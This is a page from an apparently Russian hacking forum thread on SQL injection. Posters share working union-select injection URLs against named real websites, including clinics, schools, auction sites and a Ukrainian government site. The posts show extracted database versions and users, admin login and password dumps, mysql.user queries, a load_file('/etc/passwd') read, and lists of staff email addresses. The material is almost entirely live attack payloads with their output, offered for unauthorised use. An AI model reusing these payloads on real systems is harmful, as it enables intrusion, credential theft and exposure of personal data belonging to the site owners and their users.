SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 561 of 798
  1. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    Database Version: 4.1.10a
    Database name: mss
    User name: mss@localhost
     
    #11201 F4R, 22 Nov 2009
    1 person likes this.
  2. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    Database Version: 4.1.15-Debian_1ubuntu5-log
    Database name: gigaspark2_bolnica
    User name: bolnica_user@localhost
     
    #11202 F4R, 22 Nov 2009
  3. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    Database Version: 5.0.51a-24+lenny1-log
    Database name: ccp
    User name: ccp@localhost
     
    #11203 F4R, 22 Nov 2009
    Last edited by a moderator: 22 Nov 2009
    2 people like this.
  4. fox_malder

    fox_malder Active Member

    Joined:
    28 Nov 2008
    Messages:
    162
    Likes Received:
    131
    Reputations:
    73
    http://www.kirghizie.fr/programme.php?id=-7%27+and+0+union+select+1,DATABASE(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
    ultimate

    http://www.kirghizie.fr/programme.php?id=-7%27+and+0+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
    5.0.84-log

    http://www.kirghizie.fr/programme.php?id=-7%27+and+0+union+select+1,USER(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
    root@localhost
     
    #11204 fox_malder, 22 Nov 2009
    2 people like this.
  5. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://www.vip-clinic.by/site/news.php?ID=-10+union+select+1,2,3,4,group_concat(table_name)+from+information_schema.tables--

    ТИЦ: 10
    PR: 5
     
    #11205 Bramin, 22 Nov 2009
    1 person likes this.
  6. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    biokmetijazel-puksic.si
    Code:
    http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),3,4,5,6,7,8,9,10,11,12+--+

    Version: 5.0.45-log
    User: biokmetijazel@localhost
    Database: biokmetijazel
    OS: Linux
    Base dir: /usr/
    Data dir: /var/lib/mysql/
    Tmp dir: /tmp/

    Таблицы:

    Code:
    http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+0,1+--+
    1. phplist_admin:
    Code:
    http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,concat(loginname,0x3A,password),3,4,5,6,7,8,9,10,11,12+from+phplist_admin+limit+0,1+--+
    2. users:
    Code:
    http://www.biokmetijazel-puksic.si/news.php?id=86+and+0+union+select+1,concat(username,0x3A,password),3,4,5,6,7,8,9,10,11,12+from+phplist_admin+limit+0,1+--+
     
    #11206 Sams, 22 Nov 2009
    2 people like this.
  7. fox_malder

    fox_malder Active Member

    Joined:
    28 Nov 2008
    Messages:
    162
    Likes Received:
    131
    Reputations:
    73
    http://www.bienvenueaparis.fr/flat.php?id=14+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--

    http://www.bienvenueaparis.fr/flat.php?id=14+and+0+union+select+1,2,DATABASE(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--
    bienvenueapariscom

    http://www.bienvenueaparis.fr/flat.php?id=14+and+0+union+select+1,2,VERSION(),USER(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--
    5.0.67-log
    [email protected]

    http://www.bienvenueaparis.fr/flat.php?id=14+and+0+union+select+1,2,login,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+phpmv_users--
    дальше не стал
     
    #11207 fox_malder, 22 Nov 2009
    3 people like this.
  8. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Code:
    http://www.lademence.be/pages/commentaires/news.php?action=affiche_commentaires&id=-26+union+select+1,2,unhex(hex(concat_ws(0x3a,user_id,user_level,user_pwd,user_nom,user_prenom,user_pseudo,user_email,user_post_format,user_edit_size,user_pref_cat,user_lang,user_delta,user_post_pub))),4+from+dc_user--
     
    #11208 547, 23 Nov 2009
    2 people like this.
  9. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    d-poljane.lj.edus.si

    Code:
    http://www.d-poljane.lj.edus.si/klepetalnica/detail.php?pid=-100+union+select+1,convert(concat(user(),0x3A,version(),0x3A,database()),binary),3,4,5,6,7,8,9,10,11,12+--+
    Version: 4.1.14
    User: dd-poljane@localhost
    Database: ddp
    OS: portbld-freebsd 4.8
     
    #11209 Sams, 24 Nov 2009
    2 people like this.
  10. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    to Gaus

    Code:
    http://www.game-reviews.ca/news.php?id=1422+and+1=0+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9,10,11+from+admin--
    5.0.67-standard:gamerevi_news@localhost:gamerevi_gamenews


    Там есть еще данные форума

    [ username,password ] from [gamerevi_gamenews.pubb2_users ]
     
    #11210 hackmen, 24 Nov 2009
    2 people like this.
  11. IgAlex

    IgAlex Member

    Joined:
    17 Nov 2008
    Messages:
    36
    Likes Received:
    27
    Reputations:
    8
    Скандинавские аукционы - дырявый движок, 3 скули для примера

    lockemout.com

    Code:
    http://lockemout.com/productdetails.php?pid=3&aid=448+union+all+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83--
    5.0.81-community:lmocom_bd:lmocom_bdu@localhost

    biddango.com

    Code:
    http://biddango.com/productdetails.php?pid=10&aid=-9999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83--
    5.0.85-community:biddango_auction:biddango_admin@localhost

    yayabids.com

    Code:
    http://yayabids.com/productdetails.php?pid=4&aid=-9999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92--
    5.0.81-community:yayabids_yaya:yayabids_yaya@localhost
     
    #11211 IgAlex, 24 Nov 2009
    Last edited: 24 Nov 2009
    2 people like this.
  12. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    blueprintskateboards.com

    Code:
    http://www.blueprintskateboards.com/news.php?id=-1110+UNION+SELECT+1,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database())
,3,4,5,6+--+

    Version: 4.1.20
    User: blueprint@localhost
    Database: blueprint
    OS: Linux


    finishing-blasting.com

    Code:
    http://www.finishing-blasting.com/news.php?id=-114+UNION+SELECT+1,2,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),4+--+
    Version: 4.1.22-max-log
    User: [email protected]
    Database: finishingblast
    OS: Linux



    todaysgrocery.com

    Code:
    http://www.todaysgrocery.com/news.php?id=-0045+UNION+SELECT+1,2,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),4+--+
    Version: 4.1.22-standard
    User: graphici_admin@localhost
    Database: graphici_grocery
    OS: Linux
     
    #11212 Sams, 24 Nov 2009
    3 people like this.
  13. IgAlex

    IgAlex Member

    Joined:
    17 Nov 2008
    Messages:
    36
    Likes Received:
    27
    Reputations:
    8
    geogen.ge

    Code:
    http://www.geogen.ge/index.php?id_menu=51&id_menu_up=&lang=&abc=1&id_let=2+union+all+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,6,7--
    5.0.81-community-log:geogenge_geo:geogenge@localhost
     
    #11213 IgAlex, 25 Nov 2009
    Last edited: 30 Nov 2009
    1 person likes this.
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.radiochango.com/catala/foros/missatges.php?ID=207&IDM=131265+uNiOn+sElEct+1,concat_ws(0x3a3a,VCH_login,VCH_password),3+from+rc_usuarios+--+
    Code:
    http://seosamhgriangraf.com/texts.php?menu_id=-3+uNiOn+sElEct+1+--+&menu_order=4
    Code:
    http://islandtripper.com/islands.php?id=-2+union+select+1,2,3,4+--+
    Code:
    http://ijpr.iut.ac.ir/magazine.php?magazine=ijpr+union+select+1,file_priv,3,4+from+mysql.user+--+
    Code:
    http://www.wjxz.com/view.php?id=-502+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
    Code:
    http://capeclearislandferry.com/texts.php?menu_id=-16+union+select+concat_ws(0x3a3a,user_name,password)+from+control_user+--+&menu_order=5'
    Code:
    http://www.pvpubs.com/magazine.php?id=-1+union+select+concat_Ws(0x3a3a,username,password)+from+user+--+
     
    #11214 DezMond™, 25 Nov 2009
    2 people like this.
  15. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.witec.de/en/company/witecnews/news.php?id=-25+union+select+1,2,concat_ws(0x3a,user(),version(),database,@@version_compile_os),4,5,6--

    user:d004aa52@localhost
    version:5.0.45-community-log
    database:d004aa52
    OS:pc-linux-gnu
     
    #11215 547, 25 Nov 2009
  16. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    gymsite@localhost:globalso_gymcan:5.0.67-community
    Code:
     http://www.gymcan.org/site/news.php?id=-118+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15--
    dbo39874005@localhost:db39874005:4.0.27-standard
    Code:
     http://www.iwr.de/news.php?id=-13392+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7--

    [email protected]:db251077112:4.0.27-max-log
    Code:
    http://www.atomicforce.de/News.php?ID=-47+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5--

    dbo161593295@localhost:db161593295:4.0.27-standard
    Code:
    http://www.busplaner.de/nachricht/news.php?id=-59708+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6--
     
    #11216 hack-win32, 26 Nov 2009
    2 people like this.
  17. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.amrophever.com/leader.php?menu=2&id=-4+union+select+concat_ws(0x3a,user,password,file_priv,0x3a,host)+from+mysql.user
    root:[censored]:Y:localhost
    MySQL 4.1.20-log
    http://www.amrophever.com/leader.php?menu=2&id=-4+union+select+load_file('/etc/passwd') - чтение файлов на сервере
    если напрячься и раскрыть пути, то и outfile прокатит
     
    #11217 Bb0y, 26 Nov 2009
    3 people like this.
  18. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    http://www.ppngo.org

     
    #11218 Snap, 27 Nov 2009
    2 people like this.
  19. fox_malder

    fox_malder Active Member

    Joined:
    28 Nov 2008
    Messages:
    162
    Likes Received:
    131
    Reputations:
    73
    http://www.windbrake.us/news.php?ID=-823+and+0+union+select+1,concat_ws(0x3a,user(),database(%20%20),version()),3,4,5,6+--+

    user - [email protected]
    database - cibf
    version - 5.0.26
     
    #11219 fox_malder, 27 Nov 2009
    1 person likes this.
  20. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    версия: 5.0.76
    пользователь: [email protected]
    БД:sim3_db6
    ОС:unknown-linux-gnu


    PostgreSQL
    имя базы данных: spfu_2
    версия: PostgreSQL 8.0.8 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
    пользователь spfu

    узнаем другие базы
    http://www.spfu.gov.ua/ukr/news_big.php?id=-6374+union+select+null,datname,null,datname,null+from+pg_database%20limit+1+offset+1--+&noanons=noanons&all_news=&page=
    перебирал параметром оффсет:
    spfu_2
    template0
    template1



    таблицы
    admin
    answer
    applicable_roles
    article
    check_constraints
    circulate_history
    ...

    узнаем колонки
    атрибуты admin:
    email
    id
    inet_request
    name
    pr


    ящики

    [email protected](Наташа (личный)
    [email protected](Наташа
    [email protected](Олександр Степанович
    [email protected](з приводу плати за оренду майна
    [email protected](Департамент маркетингу ФДМУ
    [email protected](Радіопроект
     
    #11220 Strilo4ka, 28 Nov 2009
    Last edited: 28 Nov 2009
    4 people like this.
(You must log in or sign up to post here.)
Page 561 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.